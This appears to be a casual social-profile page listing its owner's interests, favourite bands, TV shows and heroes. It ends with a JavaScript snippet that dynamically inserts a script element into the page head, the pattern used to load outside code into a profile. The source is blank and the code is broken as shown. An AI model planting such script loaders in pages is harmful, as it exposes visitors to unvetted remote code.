Photos, Photos, Photos! Anything that has to do with Photography - Tennis - Photos - Porn - Photos - Surfing - Photos - Drums - Music - Concerts - Volleyball - The beach - Photos -Economics - Traveling -Photos - get the picture? Have any of those??? call me!
Anyone that is willing to stand up in front of my camera!
Genesis-Phil Collins- Led Zeppelin - Pink Floyd- The Rolling Stones- AC/DC - Peter Gabriel - Klubbin' Music- Soda stereo- Los Pericos-National Dust- Los Pinguos - and many more that I can't remember right now, but mostly everything!
Myspace Codes:
The Simpsons! LOVE THEM! South Park- Any Concert, any Sports, any old movie!
many many..
MySpace Comments Graphics
Osvaldo, Liliana, Ruben, Phil Collins, Chester Thompson, John Bonham ,Homer Simpson, Diego Maradona, Andre Agassi, Guillermo Vilas, Pete Sampras, Ayrton Senna, I'll add more later.. .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"